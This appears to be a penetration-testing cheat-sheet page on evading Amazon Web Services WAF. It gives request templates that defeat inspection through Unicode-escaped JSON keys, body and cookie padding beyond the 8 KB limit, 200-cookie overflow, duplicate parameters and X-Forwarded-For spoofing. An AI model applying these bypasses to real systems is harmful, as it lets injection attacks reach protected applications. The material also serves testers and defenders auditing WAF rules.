Amazon Web Services WAF

Table of Contents

For general bypass techniques, see WAF Bypass.

Fingerprint

The server response looks like:

HTTP/2 403 Forbidden
Server: awselb/2.0
[...]

Bypass with encoding

AWS WAF, in its current implementation, does not decode escape sequences inside JSON keys when matching a given JSON Pointer of a rule. This behavior can be exploited to bypass rules that specifically target the value of a parameter, such as the “id” parameter. By replacing any character of the key with a Unicode escape sequence, an attacker can effectively evade the rule and potentially pass malicious content undetected.

POST /some-vulnerable-api HTTP/2
Host: ...

{"\u0070aram1":"some payload"}

Bypass with content size

For JSON body inspection, only the first 8 KB (8,192 bytes) of the request body are forwarded to AWS WAF for inspection. Add 8 KB of spaces before the payload in the body.

This works for attacks such as SQL injection (SQLi) and Cross Site Scripting (XSS).

For Application Load Balancer and AWS AppSync, AWS WAF can inspect the first 8 KB of the body of a request. For CloudFront, API Gateway, Amazon Cognito, App Runner, and Verified Access, by default, AWS WAF can inspect the first 16 KB, and you can increase the limit up to 64 KB in your web ACL configuration.

Most site have JSON protection so this would not work.

POST /some-vulnerable-api HTTP/2
Host: ...
                                                                                                                                                     {<Insert 8192 space characters here>"param1":"SQLi payload"}
POST /some-vulnerable-api HTTP/2
Host: ...
                                                                                                                                                     {<Insert 8192 space characters here>"param1":"SQLi payload"}

Generate a string of 1024 characters. Set a global variable “waf_bypass” with HackVertor in Burp Suite:

msf-pattern_create -l 1024

If there is some JSON protection, add another JSON attribute and add the characters in there…

POST /some-vulnerable-api HTTP/2
Host: ...

{"whatever":"<@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/>","param1":"SQLi payload"}

Bypass for cookies

What AWS WAF should do if the cookies of the request are more numerous or larger than AWS WAF can inspect. AWS WAF does not support inspecting the entire contents of request cookies when they exceed 8 KB (8192 bytes) or 200 total cookies. The underlying host service forwards a maximum of 200 cookies and at most 8 KB of cookie contents to AWS WAF.

Some cookie names like “debug” are blocked. Use Param Miner. Right-click on a request -> Extensions -> Param Miner -> Guess params -> Guess cookie parameters.

Large cookie

Same as bypass with content size, but applied to cookies.

POST /some-vulnerable-api HTTP/2
Host: ...
Cookie: cookie1=<@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/>; <MY-BLOCKED-COOKIE-HERE>

[...]

Too many cookies

Generate 200 cookies in Python.

python
payload=""
for i in range(200):
   payload = payload + "cookie" + str(i) + "=a;"
print(payload)

Insert the 200+ cookies in the request, and add the blocked cookie after.

POST /some-vulnerable-api HTTP/2
Host: ...
Cookie: cookie1=a;cookie2=a; ...; cookie200=a; <MY-BLOCKED-COOKIE-HERE>

[...]

Bypass with duplicate parameter

This depends on the rule used for invalid JSON handler. The default option is “None”, which means taking no action and proceed with the request.

POST /some-vulnerable-api HTTP/2
Host: ...

{"param1":"whatever", "param1":"some payload"}

Bypass with HTTP headers

By default, AWS WAF uses the IP address from the web request origin. It can be configured to use headers (typically “X-Forwarded-For”) when using proxies or load balancers.

Append HTTP header “X-Forwarded-For”.

X-Forwarded-For: 10.0.0.1

Also use extension IP Rotate (GitHub) for Burp Suite. Configure AWS credentials with API Gateway permissions in the extension interface.

Reference